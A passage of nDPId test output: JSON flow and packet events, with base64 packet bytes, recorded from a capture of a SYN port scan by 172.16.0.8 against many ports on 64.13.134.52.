-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs6ogAACUGOOqsEAAIQA2GNIzSBC3dUoMYAAAAAGACCAAsYgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060496,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_packet_id":1,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060496,"pkt":"ACYLMQczACWzv5HuCABFAAAsm4gAADYGduqsEAAIQA2GNIzSPvHdUoMYAAAAAGACDADtnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsX1oAACYGwxisEAAIQA2GNIzTI4\/dU4MZAAAAAGACDAAI\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZuAAAC0GtJKsEAAIQA2GNIzTFxbdU4MZAAAAAGACCAAZdgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCQAACcGgU6sEAAIQA2GNIzTArPdU4MZAAAAAGACEAAl2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZsIAACkGuLCsEAAIQA2GNIzTBqTdU4MZAAAAAGACCAAp6AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsjm8AADsGfwOsEAAIQA2GNIzTBCzdU4MZAAAAAGACEAAkYAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsNcIAADsG17CsEAAIQA2GNIzTAcrdU4MZAAAAAGACEAAmwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsQD4AAC8G2TSsEAAIQA2GNIzTCjDdU4MZAAAAAGACEAAeXAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsRiMAACwG1k+sEAAIQA2GNIzTF0DdU4MZAAAAAGACBAAdTAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsnG0AADEGewWsEAAIQA2GNIzTCVrdU4MZAAAAAGACCAAnMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsx\/4AACcGWXSsEAAIQA2GNIzTD6TdU4MZAAAAAGACEAAY6AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsd04AADEGoCSsEAAIQA2GNIzTAavdU4MZAAAAAGACCAAu4QAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHoAADUGvvisEAAIQA2GNIzTrZrdU4MZAAAAAGACCACC8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsHa8AADMG98OsEAAIQA2GNIzTE9\/dU4MZAAAAAGACEAAUrQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs7BgAAC8GLVqsEAAIQA2GNIzTCIPdU4MZAAAAAGACEAAgCQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsqeUAADIGbI2sEAAIQA2GNIzSAFHdUoMYAAAAAGACDAAsPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsFL0AADgG+7WsEAAIQA2GNIzSDJXdUoMYAAAAAGACBAAn+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsrY4AADkGYeSsEAAIQA2GNIzSCf3dUoMYAAAAAGACCAAmkgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsa9wAADQGqJasEAAIQA2GNIzSACXdUoMYAAAAAGACBAA0agAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs78gAACwGLKqsEAAIQA2GNIzSCFfdUoMYAAAAAGACBAAsOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv00AACwGXSWsEAAIQA2GNIzSCvndUoMYAAAAAGACBAAplgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs9QwAADoGGWasEAAIQA2GNIzSx5\/dUoMYAAAAAGACDABk7wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZkAAC0GUdmsEAAIQA2GNIzSDx\/dUoMYAAAAAGACCAAhcAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsVS8AADkGukOsEAAIQA2GNIzSAA3dUoMYAAAAAGACCAAwggAAAgQFtA=="} 
